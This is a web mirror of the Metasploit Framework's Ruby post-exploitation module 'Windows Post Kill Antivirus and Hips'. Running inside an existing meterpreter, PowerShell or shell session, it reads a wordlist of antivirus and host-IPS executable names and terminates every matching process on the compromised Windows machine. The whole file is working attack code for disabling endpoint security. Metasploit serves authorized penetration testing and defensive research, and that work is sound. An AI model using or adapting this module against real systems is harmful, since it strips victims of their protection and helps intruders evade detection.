CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/manage/killav.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::Process

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'Windows Post Kill Antivirus and Hips',

14
        'Description' => %q{

15
          This module attempts to locate and terminate any processes that are identified

16
          as being Antivirus or Host-based IPS related.

17
        },

18
        'License' => MSF_LICENSE,

19
        'Author' => [

20
          'Marc-Andre Meloche (MadmanTM)',

21
          'Nikhil Mittal (Samratashok)',

22
          'Jerome Athias',

23
          'OJ Reeves'

24
        ],

25
        'Platform' => ['win'],

26
        'SessionTypes' => %w[meterpreter powershell shell],

27
        'Notes' => {

28
          'Stability' => [OS_RESOURCE_LOSS],

29
          'Reliability' => [],

30
          'SideEffects' => []

31
        },

32
        'Compat' => {

33
          'Meterpreter' => {

34
            'Commands' => %w[

35
              stdapi_sys_process_get_processes

36
              stdapi_sys_process_kill

37
            ]

38
          }

39
        }

40
      )

41
    )

42
  end

43


44
  def run

45
    avs = ::File.read(

46
      ::File.join(

47
        Msf::Config.data_directory,

48
        'wordlists',

49
        'av_hips_executables.txt'

50
      )

51
    )

52
    avs = avs.strip.downcase.split("\n").uniq

53


54
    skip_processes = [

55
      '[system process]',

56
      'system'

57
    ]

58


59
    av_processes = get_processes.reject { |p| skip_processes.include?(p['name'].downcase) }.keep_if { |p| avs.include?(p['name'.downcase]) }

60
    if av_processes.empty?

61
      print_status('No target processes were found.')

62
      return

63
    end

64


65
    processes_killed = 0

66
    av_processes.each do |x|

67
      process_name = x['name']

68
      pid = x['pid']

69


70
      print_status("Attempting to terminate '#{process_name}' (PID: #{pid}) ...")

71
      if kill_process(pid)

72
        processes_killed += 1

73
        print_good("#{process_name} (PID: #{pid}) terminated.")

74
      else

75
        print_error("Failed to terminate '#{process_name}' (PID: #{pid}).")

76
      end

77
    end

78


79
    print_good("A total of #{av_processes.length} process(es) were discovered, #{processes_killed} were terminated.")

80
  end

81
end

82


83